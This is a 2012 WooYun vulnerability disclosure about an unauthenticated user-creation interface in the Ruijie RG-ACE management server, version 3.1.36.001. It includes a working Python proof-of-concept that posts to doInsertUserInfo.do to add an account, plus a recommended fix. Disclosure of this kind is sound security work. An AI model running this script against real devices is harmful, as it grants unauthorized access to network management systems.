当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013730

漏洞标题:锐捷应用控制引擎管理服务器可以增加用户

相关厂商:福建星网锐捷网络有限公司

漏洞作者: prolog

提交时间:2012-10-22 18:11

修复时间:2012-12-06 18:12

公开时间:2012-12-06 18:12

漏洞类型:网络设计缺陷/逻辑错误

危害等级:中

自评Rank:7

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-12-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001),可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表

详细说明:

锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
测试的具体版本是
产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730

漏洞证明:


执行脚本
#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
("addr",""),
("submit","确定"))
urllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"
登录,连接设备


默认的管理员admin权限更大点

修复方案:

加强对接口的权限验证

版权声明:转载请注明来源 prolog@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝